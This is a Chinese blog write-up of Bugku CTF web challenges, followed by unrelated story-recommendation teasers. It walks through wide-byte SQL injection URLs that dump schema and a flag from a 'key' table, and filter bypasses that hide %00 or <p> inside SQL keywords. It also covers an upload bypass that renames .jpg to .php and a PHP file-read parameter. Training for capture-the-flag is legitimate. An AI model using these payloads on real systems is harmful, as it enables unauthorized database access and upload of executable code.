bugku-web-writeup

1.web基础$_GET

writeup:

输入http://120.24.86.145:8002/get/?what=flag,得到flag


2.web基础$_POST

writeup:

使用火狐浏览器插件hackbar中的 PostData,发送post数据,得到flag


3.矛盾

writeup:

is_numeric—检测变量是否为数字或数字字符串,首先匹配第一个if需要输入一个字符串,匹配第二个if需要满足==1,输入 1x66。

4.web2

writeup:

审查元素,找到flag

5.文件上传测试

writeup:

上传.jpg图片文件,使用burpsuite进行拦截,发送到repeater,将.jpg更改为.php,上传得到flag

6.计算题-随机数字运算验证码

使用firebug查看源代码,发现文本框限制了输入的长度为1,直接修改maxlength值,输入答案即可得到flag


7.web3


writeup:

阻止此页面创建更多对话框,查看网页源代码

使用firebug控制台,document.write("")进行解码输出,得到flag

8.sql注入

查看网页源代码,发现采用gb2312进行编码,考虑宽字节注入,使用%df+%27

成功报错,随后进行注入

(1)确定列数,列数为2列

http://103.238.227.13:10083/?id=1%df' order by 2 %23          //正常

http://103.238.227.13:10083/?id=1%df' order by 3 %23          //报错

(2)爆数据库名

http://103.238.227.13:10083/?id=-1%df' union select 1,database() %23

http://103.238.227.13:10083/?id=-1%df' union select 1,group_concat(schema_name) from information_schema.schemata %23

(3)爆破表名

http://103.238.227.13:10083/?id=1%df%27 union select 1,table_name from information_schema.tables %23

发现key表

(4)爆列名

http://103.238.227.13:10083/?id=1%df%27 union select 1,column_name from information_schema.columns %23

发现string 和key两列。最后发现key既是列名又是表名会产生冲突,用 ` 来包含住表名 `key` 表示表。

http://103.238.227.13:10083/?id=-1%df%27 union select 1,string from `key` where id=1 %23

得到flag

另外,也可以使用sql5.key替代`key`,实现同样的效果,得到flag。

http://103.238.227.13:10083/?id=-1%df%27 union select 1,string from sql5.key where id=1%23

9.SQL注入1

输入 and 1=1,发现and关键字被过滤了,经过尝试发现or,union,select等array数组中的都被过滤了。

使用双写andand,anandd,等发现都被过滤了,从大牛的writeup中学习到了,重点关注这个XSS过滤函数,

strip_tags该函数尝试返回给定的字符串$id去除空字符、HTML 和 PHP 标记后的结果。

尝试常用的空字符“%00”,HTML标签“<p>”等,发现绕过成功。

http://103.238.227.13:10087/?id=1 a%00nd 1=1

http://103.238.227.13:10087/?id=-1 un<p>ion sel<p>ect 1,2%23

(1)爆列名

http://103.238.227.13:10087/?id=1 o%00rder by 2 %23

http://103.238.227.13:10087/?id=1 o<p>rder by 2 %23

http://103.238.227.13:10087/?id=1 o%00rder by 3 %23,返回结果为空,确定为2列

(2)爆数据库名

http://103.238.227.13:10087/?id=-1 uni%00on s%00elect 1,database() %23

(3)爆字段值

http://103.238.227.13:10087/?id=-1 uni%00on s%00elect 1,hash fro%00m sql3.key %23,得到flag

10. 你必须让他停下

打开页面,页面中js自动刷新,根据题目意思是,要让界面停止刷新,所以我们可以使用burf1.7.26工具进行页面拦截,然后使用repeater中的go功能,来一次一次的浏览页面,若干次go之后,在HTML标签中得到flag。

11.本地包含

方法1:直接输入?hello=file("flag.php"),通过file使其以数组形式返回然后利用var_dump输出,所以直接输入

?hello=file("flag.php")
使其前端输出即可得到flag

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,686评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,668评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,160评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,736评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,847评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,043评论 1 291
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,129评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,872评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,318评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,645评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,777评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,470评论 4 333
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,126评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,861评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,095评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,589评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,687评论 2 351

推荐阅读更多精彩内容